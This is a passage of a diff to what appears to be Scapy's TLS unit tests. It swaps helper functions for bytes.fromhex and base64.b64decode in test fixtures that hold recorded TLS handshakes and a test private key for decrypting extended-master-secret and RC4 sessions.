d482cc3a94082351117e45362319a842556954160d34c9019cc3cd312073ce540d031c4bf197b924a139b0e91bffc168a80c1641834445c509d6edf2daf8a247b72104b184968ef25cc260c75b28f470fc355477ac403da12701556e6e7550a38346f444238a154f1efb1a1a297eff39e35d76bc285599d19b0bd475d6f1daba94f1365dbc930041a79ca2df1bb724d53e4fb8831b8dc486522ee7d8eee0e1fea658352736fe949fcb233c08a3b9e14abc56a5556f9b469925cb5916ed058a4cf332c4c13a75ca83850773f9182ad95fadff51203c08e684df63b00044e3082044a30820332a003020102020d01e3b49aa18d8aa981256950b8300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523231133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3137303631353030303034325a170d3231313231353030303034325a3042310b3009060355040613025553311e301c060355040a1315476f6f676c65205472757374205365727669636573311330110603550403130a47545320434120314f3130820122300d06092a864886f70d01010105000382010f003082010a0282010100d018cf45d48bcdd39ce440ef7eb4dd69211bc9cf3c8e4c75b90f3119843d9e3c29ef500d10936f0580809f2aa0bd124b02e13d9f581624fe309f0b747755931d4bf74de1928210f651ac0cc3b222940f346b981049e70b9d8339dd20c61c2defd1186165e7238320a82312ffd2247fd42fe7446a5b4dd75066b0af9e426305fbe01cc46361af9f6a33ff6297bd48d9d37c1467dc75dc2e69e8f86d7869d0b71005b8f131c23b24fd1a3374f823e0ec6b198a16c6e3cda4cd0bdbb3a4596038883bad1db9c68ca7531bfcbcd9a4abbcdd3c61d7931598ee81bd8fe264472040064ed7ac97e8b9c05912a1492523e4ed70342ca5b4637cf9a33d83d1cd6d24ac070203010001a38201333082012f300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b0601050507030230120603551d130101ff040830060101ff020100301d0603551d0e0416041498d1f86e10ebcf9bec609f18901ba0eb7d09fd2b301f0603551d230418301680149be20757671c1ec06a06de59b49a2ddfdc19862e303506082b0601050507010104293027302506082b060105050730018619687474703a2f2f6f6373702e706b692e676f6f672f6773723230320603551d1f042b30293027a025a0238621687474703a2f2f63726c2e706b692e676f6f672f677372322f677372322e63726c303f0603551d20043830363034060667810c010202302a302806082b06010505070201161c68747470733a2f2f706b692e676f6f672f7265706f7369746f72792f300d06092a864886f70d01010b050003820101001a803e3679fbf32ea946377d5e541635aec74e0899febdd13469265266073d0aba49cb62f4f11a8efc114f68964c742bd367deb2a3aa058d844d4c20650fa596da0d16f86c3bdb6f0423886b3a6cc160bd689f718eee2d583407f0d554e98659fd7b5e0d2194f58cc9a8f8d8f2adcc0f1af39aa7a90427f9a3c9b0ff02786b61bac7352be856fa4fc31c0cedb63cb44beaedcce13cecdc0d8cd63e9bca42588bcc16211740bca2d666efdac4155bcd89aa9b0926e732d20d6e6720025b10b090099c0c1f9eadd83beaa1fc6ce8105c085219512a71bbac7ab5dd15ed2bc9082a2c8ab4a621ab63ffd7524950d089b7adf2affb50ae2fe1950df346ad9d9cf5ca') r1 = TLS(cli_hello) r2 = TLS(ser_hello, tls_session=r1.tls_session.mirror()) @@ -1011,10 +1011,10 @@ from scapy.layers.tls.cert import PrivKey from scapy.layers.tls.handshake import TLSFinished from scapy.layers.tls.record import TLS -chello_extms = hex_bytes(b'1603010200010001fc0303f8b3dbcb70ed3804009c15af4a4298720619b70d1ad4f24d0e99de9e93ce3c3b201c3b2cf3266bcba19b29479ec66fe815f7db0a6b976111f70958395e7aeebaba003e130213031301c02cc030009fcca9cca8ccaac02bc02f009ec024c028006bc023c0270067c00ac0140039c009c0130033009d009c003d003c0035002f00ff01000175000b000403000102000a000c000a001d0017001e00190018337400000010000e000c02683208687474702f312e31001600000017000000310000000d002a0028040305030603080708080809080a080b080408050806040105010601030303010302040205020602002b00050403040303002d00020101003300260024001d0020e8410f5ab09d96b05f10183ccd9e93a057a73290b4c9e1c254cdfc299fc01d41001500d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000') -shello_extms = hex_bytes(b'160303005502000051030320a54032477ea3a963b8a700090459f11f1f4ad1896e1d75745b7e2bdc51dde0200600f552db6c51b97a309717ff847bb6e8fef1ce2601544413fda7b66075b887009d000009ff0100010000170000160303036e0b00036a0003670003643082036030820248a003020102020900eb73b71c3e2f9fdc300d06092a864886f70d01010b05003045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c7464301e170d3139303231353135313430335a170d3239303231323135313430335a3045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c746430820122300d06092a864886f70d01010105000382010f003082010a0282010100d2f7d36b233a5619368fc3a7db0f2364dc71986dd4eebcbee85b783e139cfeb0a80de50147c936aa84230e2fa2eb91ef1737410387b932440ac7cfda3c5966eef88f688bcbee6a5d0dfaa075b77dfe836f2cb318375ff5be2b35f6d62dd7c4b147224f67d53d95c7fcc11cda7bc622369b4d4a685655169fb28f66e511724f0c9af2f74ea4cdf09b92f917246a582f67fade3eff7eca2c794d713c13f80cd53f847aa196d0adc04494790a628e327f4b53d05b83025c3ea541195f953ce6fc37edcc68a8fd6eca621f38bc08bc2d8d72cfcdf85c68f9f4f4485b32133c63299f85ffd62bde5a9d585e5a896f08319448277f19e86d5d6878bc53768b2ef9b3210203010001a3533051301d0603551d0e041604148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35301f0603551d230418301680148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35300f0603551d130101ff040530030101ff300d06092a864886f70d01010b050003820101003c001f0f5d106072e0beedfa47895329d4623422080e66caa4beb4c3d9b6868fa107467d6160e512ede7cbbefdeb17c09b9f594f86f1a9922c982ccf9655d4d67eda061f667eeb25fe7203bea00e40f150a490a78ca963d87c185ade8b7c294f5052fb1e1edb3403831e33e4026c8e56717cb77bc32321858be37a77fe7f5511ef8c2013c86e2730c5b2366875131cae0c7616fdc7c8605696133e7a685f20203c0db8e0ff1d1a5991d2f058f48f20b10a5fb0df27a1f9874cc0fe8d6ebf77e9a7ba38490e9d63241a0fb3fd7701ff3b130c9aa7aa77770280b7003c1bb5e0784c34aacb74ce8114960e50eee04602a7ab20e5c878028e4292e90e40fd631fee16030300040e000000') -finished_extms = hex_bytes(b'160303010610000102010007534dd8642e57edd33d156d8002f70562864c1dfe5d721763e8e4ef2c03fb14b4e4eac1864c41fcce57367f95798f04954ef957deb934536b0ac39a72c14f772d0f64b7cc0d8260e2019748fc65fd6f382da6d4f873afe6fc1fa17e786cf6c72b6a46950d2030c7b42ed10f2c4dba37282001132ddb151a44f6face6b049338217784cf2a5ac6a054a2a1d205fb7657d7affa14113c43314b54b28164423455174f57eb50f6eea0836ba1c68616db720641bf18f0cdf7bb729c9cc0b4cfeee8aeed94e00573210eb5328cbcca4ccb1aa29a910c5b5f2c96cf3a431e9677980400d574244ff6bfdabf36ba9dda84703f5760d607e4b731d4f1dc16372b0feac11403030001011603030028269118aa98b35c71e35034f35c23c78d55c04662cdb71c11b1ef862e3b4ebf8ace2aff053257bb08') -key = base64_bytes(b'LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUV2UUlCQURBTkJna3Foa2lHOXcwQkFRRUZBQVNDQktjd2dnU2pBZ0VBQW9JQkFRRFM5OU5ySXpwV0dUYVAKdzZmYkR5TmszSEdZYmRUdXZMN29XM2crRTV6K3NLZ041UUZIeVRhcWhDTU9MNkxya2U4WE4wRURoN2t5UkFySAp6OW84V1didStJOW9pOHZ1YWwwTitxQjF0MzMrZzI4c3N4ZzNYL1crS3pYMjFpM1h4TEZISWs5bjFUMlZ4L3pCCkhOcDd4aUkybTAxS2FGWlZGcCt5ajJibEVYSlBESnJ5OTA2a3pmQ2JrdmtYSkdwWUwyZjYzajcvZnNvc2VVMXgKUEJQNEROVS9oSHFobHRDdHdFU1VlUXBpampKL1MxUFFXNE1DWEQ2bFFSbGZsVHptL0RmdHpHaW8vVzdLWWg4NAp2QWk4TFkxeXo4MzRYR2o1OVBSSVd6SVRQR01wbjRYLzFpdmVXcDFZWGxxSmJ3Z3hsRWduZnhub2JWMW9lTHhUCmRvc3UrYk1oQWdNQkFBRUNnZ0VBSGQ5NTBISHNrTVNCTlZvL0tvVzZQVTM1eDl2Rml3aXUvN2YwRHRZNEpOaGUKODVpNTFiQm9UVHpvdWRtRStGWnh4SmZPWFBHYkI4TWF3N0JxOXFDeU1xUi9xZzRoa21EOVREMXcrenBBWFFtLwpkRlRuMk85OW5MQUJ0RElmeTYzT2JJUXZPa1MzczczZHpIcUpkWDFZMnVLaXp5WjNFeFZoQjZmR3Fpa09ScU1BCmNYbjJSRzN1UXFNWk4yUkVUK1hFYWdsa1dkbGphVTdaTC9CbklRT2xGS0h2ZzVSeGFwWGpJbTM2NnFUVStreGEKWDJFZnllOUJycWxWK0o4cnYzODVjRDBQc3RkSVFTQzMxZFBzUHMrSnJMVlBKQVpGZTBLVk1lYkk2ODU1cERYZApGd1ZGcC9BOXhFa3NwRW1jS0tnL1ZkZ3JQZUxMQmxhVm9mMVhPeUhWQVFLQmdRRHhPdXFGaXJvNTNQNGZQUGlMCkFnTTNvRnpmY2xwdDFMdnduelprUmVMU1NvVFBvZSt1R2xMdTBpS3lMUHBjWm1DTCt0bldsSXBheHRYOU1CRmUKOWNvMlJpSU9WM2JZM0ZpOTBLYjlvN3NyZURhaWE5NElHNGlBYktyWjJJdktBZmFkWnBqb1hBTXZpWnBEYWxGYgprZWVCd29nV0sreTdic2EwU1RYTGVMdjF5d0tCZ1FEZjRwT2lUZ3RBNFdtMXo2WFB4Z0ZCa3A3OWVjaWhINTlICnF1cVJNNkhtQ2YzSnZqZzJCZnYyb2hYNTlTU2VnZTI5ek0yZEhmVGhSeW1vZlg5VkpyMnRYY2FhVWpkRnp1Ui8Kcm1EblJMTjVDTUFnUWNCU3M5UXFCaXdTM0hqVmpML1REcFMvblJwY2VCQnNZTFYvR1YvQkpvWDkxTlVodVRXcwpjQ0VvRmNVOVF3S0JnUUNjbCtGTHhTMTBpSGZTY1hMcVVla2l3QS9wNFVMQWoxdGRMUTFTOUdiMG1ma3pDKzBaCitPNmpKM2ZzYi9RcDdTOTVUdU1BUDdhOGpOeTJtZkI4MDFOci9nVDNpR0dYRHhyd1JUVlI2MnFDSW14YzdXYloKbm4zeTJCZmtpSVRlSW40ajJVa2pkUytBT1hRUmxUK3hFTHJXNmlBTFBJSlZmZWl4ZWVEWTc4d2NGd0tCZ0Z5aQoxcTFvbDNWd0Q1cGY0ZDdYc2Z0YzNKWkxCcjNNWk01MXBQc1JueUtjN2JyRkQyTWpGTDlYRDdyT09TbXczeHNTCm05MHY0UHc1d3IzcHQzOFhPWko3WThyRXpBUUJlRUJ3ZWI0WGloOUJoS1dVTHl6SkpiZUJ1RWpSbXRuWmxDR1QKUGU4TzVUSnZwM1FBaS9pY0dpZkVkZHF5YnNHMmJjUDgzV3RGbnNnYkFvR0FMOHF4VUx3bGlMck1ML3c3aEJNegpXSHdKM21PK0NXbzFWR3p4bi9lK3I2ejVTUW03M0VuYzlSZnVkN3RBWmU1QUhXYXVSR3RNaVNoY0J1bkl5Q0g1CnU2Q2laZU5UOTBRdElLRmVCS09QSk5WNDR1QzJtK0xKQkNGa0hzU085MHp0dHZzcmVyU0tiNG5oZ2tiZDhxQ24KbDVFZFBpZEx2NXdiY0tyc3dIVzZYSm89Ci0tLS0tRU5EIFBSSVZBVEUgS0VZLS0tLS0=') +chello_extms = bytes.fromhex('1603010200010001fc0303f8b3dbcb70ed3804009c15af4a4298720619b70d1ad4f24d0e99de9e93ce3c3b201c3b2cf3266bcba19b29479ec66fe815f7db0a6b976111f70958395e7aeebaba003e130213031301c02cc030009fcca9cca8ccaac02bc02f009ec024c028006bc023c0270067c00ac0140039c009c0130033009d009c003d003c0035002f00ff01000175000b000403000102000a000c000a001d0017001e00190018337400000010000e000c02683208687474702f312e31001600000017000000310000000d002a0028040305030603080708080809080a080b080408050806040105010601030303010302040205020602002b00050403040303002d00020101003300260024001d0020e8410f5ab09d96b05f10183ccd9e93a057a73290b4c9e1c254cdfc299fc01d41001500d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000') +shello_extms = bytes.fromhex('160303005502000051030320a54032477ea3a963b8a700090459f11f1f4ad1896e1d75745b7e2bdc51dde0200600f552db6c51b97a309717ff847bb6e8fef1ce2601544413fda7b66075b887009d000009ff0100010000170000160303036e0b00036a0003670003643082036030820248a003020102020900eb73b71c3e2f9fdc300d06092a864886f70d01010b05003045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c7464301e170d3139303231353135313430335a170d3239303231323135313430335a3045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c746430820122300d06092a864886f70d01010105000382010f003082010a0282010100d2f7d36b233a5619368fc3a7db0f2364dc71986dd4eebcbee85b783e139cfeb0a80de50147c936aa84230e2fa2eb91ef1737410387b932440ac7cfda3c5966eef88f688bcbee6a5d0dfaa075b77dfe836f2cb318375ff5be2b35f6d62dd7c4b147224f67d53d95c7fcc11cda7bc622369b4d4a685655169fb28f66e511724f0c9af2f74ea4cdf09b92f917246a582f67fade3eff7eca2c794d713c13f80cd53f847aa196d0adc04494790a628e327f4b53d05b83025c3ea541195f953ce6fc37edcc68a8fd6eca621f38bc08bc2d8d72cfcdf85c68f9f4f4485b32133c63299f85ffd62bde5a9d585e5a896f08319448277f19e86d5d6878bc53768b2ef9b3210203010001a3533051301d0603551d0e041604148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35301f0603551d230418301680148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35300f0603551d130101ff040530030101ff300d06092a864886f70d01010b050003820101003c001f0f5d106072e0beedfa47895329d4623422080e66caa4beb4c3d9b6868fa107467d6160e512ede7cbbefdeb17c09b9f594f86f1a9922c982ccf9655d4d67eda061f667eeb25fe7203bea00e40f150a490a78ca963d87c185ade8b7c294f5052fb1e1edb3403831e33e4026c8e56717cb77bc32321858be37a77fe7f5511ef8c2013c86e2730c5b2366875131cae0c7616fdc7c8605696133e7a685f20203c0db8e0ff1d1a5991d2f058f48f20b10a5fb0df27a1f9874cc0fe8d6ebf77e9a7ba38490e9d63241a0fb3fd7701ff3b130c9aa7aa77770280b7003c1bb5e0784c34aacb74ce8114960e50eee04602a7ab20e5c878028e4292e90e40fd631fee16030300040e000000') +finished_extms = bytes.fromhex('160303010610000102010007534dd8642e57edd33d156d8002f70562864c1dfe5d721763e8e4ef2c03fb14b4e4eac1864c41fcce57367f95798f04954ef957deb934536b0ac39a72c14f772d0f64b7cc0d8260e2019748fc65fd6f382da6d4f873afe6fc1fa17e786cf6c72b6a46950d2030c7b42ed10f2c4dba37282001132ddb151a44f6face6b049338217784cf2a5ac6a054a2a1d205fb7657d7affa14113c43314b54b28164423455174f57eb50f6eea0836ba1c68616db720641bf18f0cdf7bb729c9cc0b4cfeee8aeed94e00573210eb5328cbcca4ccb1aa29a910c5b5f2c96cf3a431e9677980400d574244ff6bfdabf36ba9dda84703f5760d607e4b731d4f1dc16372b0feac11403030001011603030028269118aa98b35c71e35034f35c23c78d55c04662cdb71c11b1ef862e3b4ebf8ace2aff053257bb08') +key = base64.b64decode(b'LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUV2UUlCQURBTkJna3Foa2lHOXcwQkFRRUZBQVNDQktjd2dnU2pBZ0VBQW9JQkFRRFM5OU5ySXpwV0dUYVAKdzZmYkR5TmszSEdZYmRUdXZMN29XM2crRTV6K3NLZ041UUZIeVRhcWhDTU9MNkxya2U4WE4wRURoN2t5UkFySAp6OW84V1didStJOW9pOHZ1YWwwTitxQjF0MzMrZzI4c3N4ZzNYL1crS3pYMjFpM1h4TEZISWs5bjFUMlZ4L3pCCkhOcDd4aUkybTAxS2FGWlZGcCt5ajJibEVYSlBESnJ5OTA2a3pmQ2JrdmtYSkdwWUwyZjYzajcvZnNvc2VVMXgKUEJQNEROVS9oSHFobHRDdHdFU1VlUXBpampKL1MxUFFXNE1DWEQ2bFFSbGZsVHptL0RmdHpHaW8vVzdLWWg4NAp2QWk4TFkxeXo4MzRYR2o1OVBSSVd6SVRQR01wbjRYLzFpdmVXcDFZWGxxSmJ3Z3hsRWduZnhub2JWMW9lTHhUCmRvc3UrYk1oQWdNQkFBRUNnZ0VBSGQ5NTBISHNrTVNCTlZvL0tvVzZQVTM1eDl2Rml3aXUvN2YwRHRZNEpOaGUKODVpNTFiQm9UVHpvdWRtRStGWnh4SmZPWFBHYkI4TWF3N0JxOXFDeU1xUi9xZzRoa21EOVREMXcrenBBWFFtLwpkRlRuMk85OW5MQUJ0RElmeTYzT2JJUXZPa1MzczczZHpIcUpkWDFZMnVLaXp5WjNFeFZoQjZmR3Fpa09ScU1BCmNYbjJSRzN1UXFNWk4yUkVUK1hFYWdsa1dkbGphVTdaTC9CbklRT2xGS0h2ZzVSeGFwWGpJbTM2NnFUVStreGEKWDJFZnllOUJycWxWK0o4cnYzODVjRDBQc3RkSVFTQzMxZFBzUHMrSnJMVlBKQVpGZTBLVk1lYkk2ODU1cERYZApGd1ZGcC9BOXhFa3NwRW1jS0tnL1ZkZ3JQZUxMQmxhVm9mMVhPeUhWQVFLQmdRRHhPdXFGaXJvNTNQNGZQUGlMCkFnTTNvRnpmY2xwdDFMdnduelprUmVMU1NvVFBvZSt1R2xMdTBpS3lMUHBjWm1DTCt0bldsSXBheHRYOU1CRmUKOWNvMlJpSU9WM2JZM0ZpOTBLYjlvN3NyZURhaWE5NElHNGlBYktyWjJJdktBZmFkWnBqb1hBTXZpWnBEYWxGYgprZWVCd29nV0sreTdic2EwU1RYTGVMdjF5d0tCZ1FEZjRwT2lUZ3RBNFdtMXo2WFB4Z0ZCa3A3OWVjaWhINTlICnF1cVJNNkhtQ2YzSnZqZzJCZnYyb2hYNTlTU2VnZTI5ek0yZEhmVGhSeW1vZlg5VkpyMnRYY2FhVWpkRnp1Ui8Kcm1EblJMTjVDTUFnUWNCU3M5UXFCaXdTM0hqVmpML1REcFMvblJwY2VCQnNZTFYvR1YvQkpvWDkxTlVodVRXcwpjQ0VvRmNVOVF3S0JnUUNjbCtGTHhTMTBpSGZTY1hMcVVla2l3QS9wNFVMQWoxdGRMUTFTOUdiMG1ma3pDKzBaCitPNmpKM2ZzYi9RcDdTOTVUdU1BUDdhOGpOeTJtZkI4MDFOci9nVDNpR0dYRHhyd1JUVlI2MnFDSW14YzdXYloKbm4zeTJCZmtpSVRlSW40ajJVa2pkUytBT1hRUmxUK3hFTHJXNmlBTFBJSlZmZWl4ZWVEWTc4d2NGd0tCZ0Z5aQoxcTFvbDNWd0Q1cGY0ZDdYc2Z0YzNKWkxCcjNNWk01MXBQc1JueUtjN2JyRkQyTWpGTDlYRDdyT09TbXczeHNTCm05MHY0UHc1d3IzcHQzOFhPWko3WThyRXpBUUJlRUJ3ZWI0WGloOUJoS1dVTHl6SkpiZUJ1RWpSbXRuWmxDR1QKUGU4TzVUSnZwM1FBaS9pY0dpZkVkZHF5YnNHMmJjUDgzV3RGbnNnYkFvR0FMOHF4VUx3bGlMck1ML3c3aEJNegpXSHdKM21PK0NXbzFWR3p4bi9lK3I2ejVTUW03M0VuYzlSZnVkN3RBWmU1QUhXYXVSR3RNaVNoY0J1bkl5Q0g1CnU2Q2laZU5UOTBRdElLRmVCS09QSk5WNDR1QzJtK0xKQkNGa0hzU085MHp0dHZzcmVyU0tiNG5oZ2tiZDhxQ24KbDVFZFBpZEx2NXdiY0tyc3dIVzZYSm89Ci0tLS0tRU5EIFBSSVZBVEUgS0VZLS0tLS0=') # Load key ssl_key = PrivKey(key) @@ -1035,9 +1035,9 @@ assert l3.msg[0][TLSFinished].vdata == b'\x00\x1fG\xd8VD@\x0ctK\xeee' # RC4 case -chello_extms = hex_bytes(b'160301008501000081030360037703ac90bb5e29ae0fca71b68dd8133b17b7060c13779d34f69d5c3255110000060005000400ff01000052337400000010000e000c02683208687474702f312e310016000000170000000d0030002e040305030603080708080809080a080b080408050806040105010601030302030301020103020202040205020602') -shello_extms = hex_bytes(b'1603030055020000510303c985430a03add71566a952a16249e471cd3226c0792ba42c444f574e4752440120e835d66cd3293b9fcb157d5c477848d654a2d3a42fc92bcf9c472171188f69610005000009ff0100010000170000160303036e0b00036a0003670003643082036030820248a003020102020900eb73b71c3e2f9fdc300d06092a864886f70d01010b05003045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c7464301e170d3139303231353135313430335a170d3239303231323135313430335a3045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c746430820122300d06092a864886f70d01010105000382010f003082010a0282010100d2f7d36b233a5619368fc3a7db0f2364dc71986dd4eebcbee85b783e139cfeb0a80de50147c936aa84230e2fa2eb91ef1737410387b932440ac7cfda3c5966eef88f688bcbee6a5d0dfaa075b77dfe836f2cb318375ff5be2b35f6d62dd7c4b147224f67d53d95c7fcc11cda7bc622369b4d4a685655169fb28f66e511724f0c9af2f74ea4cdf09b92f917246a582f67fade3eff7eca2c794d713c13f80cd53f847aa196d0adc04494790a628e327f4b53d05b83025c3ea541195f953ce6fc37edcc68a8fd6eca621f38bc08bc2d8d72cfcdf85c68f9f4f4485b32133c63299f85ffd62bde5a9d585e5a896f08319448277f19e86d5d6878bc53768b2ef9b3210203010001a3533051301d0603551d0e041604148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35301f0603551d230418301680148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35300f0603551d130101ff040530030101ff300d06092a864886f70d01010b050003820101003c001f0f5d106072e0beedfa47895329d4623422080e66caa4beb4c3d9b6868fa107467d6160e512ede7cbbefdeb17c09b9f594f86f1a9922c982ccf9655d4d67eda061f667eeb25fe7203bea00e40f150a490a78ca963d87c185ade8b7c294f5052fb1e1edb3403831e33e4026c8e56717cb77bc32321858be37a77fe7f5511ef8c2013c86e2730c5b2366875131cae0c7616fdc7c8605696133e7a685f20203c0db8e0ff1d1a5991d2f058f48f20b10a5fb0df27a1f9874cc0fe8d6ebf77e9a7ba38490e9d63241a0fb3fd7701ff3b130c9aa7aa77770280b7003c1bb5e0784c34aacb74ce8114960e50eee04602a7ab20e5c878028e4292e90e40fd631fee16030300040e000000') -finished_extms = hex_bytes(b'16030301061000010201004971b89ae4355a001c49ccb49ed0664a9090a2dc0c14c97563b6dd98f13004ac5327c97abf10617b1f5d19b1f6e1091ccf159693497ebda262aedba2f3b76ae217d56477cad45e2ea129c324083701c2e99e65b6d63f916f963de8d98c5357d22272c032a30acccd673d1556d01e22e206186bcda3a5845d6dacee260ab66f47ea86a4c0081faa082b398f2c65da35264428f320c354b97cd96c986da43c8510e914ffb7f8bb73baee2530c4533ae2d6a922771af689c15b42c53428978510a3e3e90a3806f77fc1cb35c2c3f34dd7e3f831a79bc59b333f0c9e8be49390cd2a8e1c88dafbb9e3e24d1e0530703dbff7cd1c516fcc21a7d484f2111f985f03f8140303000101160303002457ed5c62171e4720a5890cf9ef09323f6e2db063aeebea776a54b879ffb6a69182d15cae') +chello_extms = bytes.fromhex('160301008501000081030360037703ac90bb5e29ae0fca71b68dd8133b17b7060c13779d34f69d5c3255110000060005000400ff01000052337400000010000e000c02683208687474702f312e310016000000170000000d0030002e040305030603080708080809080a080b080408050806040105010601030302030301020103020202040205020602') +shello_extms = bytes.fromhex('1603030055020000510303c985430a03add71566a952a16249e471cd3226c0792ba42c444f574e4752440120e835d66cd3293b9fcb157d5c477848d654a2d3a42fc92bcf9c472171188f69610005000009ff0100010000170000160303036e0b00036a0003670003643082036030820248a003020102020900eb73b71c3e2f9fdc300d06092a864886f70d01010b05003045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c7464301e170d3139303231353135313430335a170d3239303231323135313430335a3045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c746430820122300d06092a864886f70d01010105000382010f003082010a0282010100d2f7d36b233a5619368fc3a7db0f2364dc71986dd4eebcbee85b783e139cfeb0a80de50147c936aa84230e2fa2eb91ef1737410387b932440ac7cfda3c5966eef88f688bcbee6a5d0dfaa075b77dfe836f2cb318375ff5be2b35f6d62dd7c4b147224f67d53d95c7fcc11cda7bc622369b4d4a685655169fb28f66e511724f0c9af2f74ea4cdf09b92f917246a582f67fade3eff7eca2c794d713c13f80cd53f847aa196d0adc04494790a628e327f4b53d05b83025c3ea541195f953ce6fc37edcc68a8fd6eca621f38bc08bc2d8d72cfcdf85c68f9f4f4485b32133c63299f85ffd62bde5a9d585e5a896f08319448277f19e86d5d6878bc53768b2ef9b3210203010001a3533051301d0603551d0e041604148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35301f0603551d230418301680148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35300f0603551d130101ff040530030101ff300d06092a864886f70d01010b050003820101003c001f0f5d106072e0beedfa47895329d4623422080e66caa4beb4c3d9b6868fa107467d6160e512ede7cbbefdeb17c09b9f594f86f1a9922c982ccf9655d4d67eda061f667eeb25fe7203bea00e40f150a490a78ca963d87c185ade8b7c294f5052fb1e1edb3403831e33e4026c8e56717cb77bc32321858be37a77fe7f5511ef8c2013c86e2730c5b2366875131cae0c7616fdc7c8605696133e7a685f20203c0db8e0ff1d1a5991d2f058f48f20b10a5fb0df27a1f9874cc0fe8d6ebf77e9a7ba38490e9d63241a0fb3fd7701ff3b130c9aa7aa77770280b7003c1bb5e0784c34aacb74ce8114960e50eee04602a7ab20e5c878028e4292e90e40fd631fee16030300040e000000') +finished_extms = bytes.fromhex('16030301061000010201004971b89ae4355a001c49ccb49ed0664a9090a2dc0c14c97563b6dd98f13004ac5327c97abf10617b1f5d19b1f6e1091ccf159693497ebda262aedba2f3b76ae217d56477cad45e2ea129c324083701c2e99e65b6d63f916f963de8d98c5357d22272c032a30acccd673d1556d01e22e206186bcda3a5845d6dacee260ab66f47ea86a4c0081faa082b398f2c65da35264428f320c354b97cd96c986da43c8510e914ffb7f8bb73baee2530c4533ae2d6a922771af689c15b42c53428978510a3e3e90a3806f77fc1cb35c2c3f34dd7e3f831a79bc59b333f0c9e8be49390cd2a8e1c88dafbb9e3e24d1e0530703dbff7cd1c516fcc21a7d484f2111f985f03f8140303000101160303002457ed5c62171e4720a5890cf9ef09323f6e2db063aeebea776a54b879ffb6a69182d15cae') # Load TLS session r1 = TLS(chello_extms) @@ -1060,10 +1060,10 @@ from scapy.layers.tls.cert import PrivKey from scapy.layers.tls.handshake import TLSFinished from scapy.layers.tls.record import TLS -client_hello = hex_bytes(b'16030100c9010000c50303611a2f42b70345cfbc5c5c4da1929bea8a2cb8b1fd10ab1341e43ffaa8856a63000038c02cc030009fcca9cca8ccaac02bc02f009ec024c028006bc023c0270067c00ac0140039c009c0130033009d009c003d003c0035002f00ff01000064000b000403000102000a000c000a001d0017001e00190018337400000010000e000c02683208687474702f312e310016000000170000000d002a0028040305030603080708080809080a080b080408050806040105010601030303010302040205020602') -server_hello = hex_bytes(b'1603030059020000550303a22c975875df69bea936cbd28b083cde754693b4f34a15a036e5e57b7f4755cf20226e6386f90e3751723beea9196640d5bbe6c7c9f314568fa3645cb7218e9159003d00000dff010001000016000000170000160303036e0b00036a0003670003643082036030820248a003020102020900eb73b71c3e2f9fdc300d06092a864886f70d01010b05003045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c7464301e170d3139303231353135313430335a170d3239303231323135313430335a3045310b30090603550406130241553113301106035504080c0a536f6d652d53746174653121301f060355040a0c18496e7465726e6574205769646769747320507479204c746430820122300d06092a864886f70d01010105000382010f003082010a0282010100d2f7d36b233a5619368fc3a7db0f2364dc71986dd4eebcbee85b783e139cfeb0a80de50147c936aa84230e2fa2eb91ef1737410387b932440ac7cfda3c5966eef88f688bcbee6a5d0dfaa075b77dfe836f2cb318375ff5be2b35f6d62dd7c4b147224f67d53d95c7fcc11cda7bc622369b4d4a685655169fb28f66e511724f0c9af2f74ea4cdf09b92f917246a582f67fade3eff7eca2c794d713c13f80cd53f847aa196d0adc04494790a628e327f4b53d05b83025c3ea541195f953ce6fc37edcc68a8fd6eca621f38bc08bc2d8d72cfcdf85c68f9f4f4485b32133c63299f85ffd62bde5a9d585e5a896f08319448277f19e86d5d6878bc53768b2ef9b3210203010001a3533051301d0603551d0e041604148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35301f0603551d230418301680148297fb8cf3d9ddf2f60ec90f92815c28e3f3ff35300f0603551d130101ff040530030101ff300d06092a864886f70d01010b050003820101003c001f0f5d106072e0beedfa47895329d4623422080e66caa4beb4c3d9b6868fa107467d6160e512ede7cbbefdeb17c09b9f594f86f1a9922c982ccf9655d4d67eda061f667eeb25fe7203bea00e40f150a490a78ca963d87c185ade8b7c294f5052fb1e1edb3403831e33e4026c8e56717cb77bc32321858be37a77fe7f5511ef8c2013c86e2730c5b2366875131cae0c7616fdc7c8605696133e7a685f20203c0db8e0ff1d1a5991d2f058f48f20b10a5fb0df27a1f9874cc0fe8d6ebf77e9a7b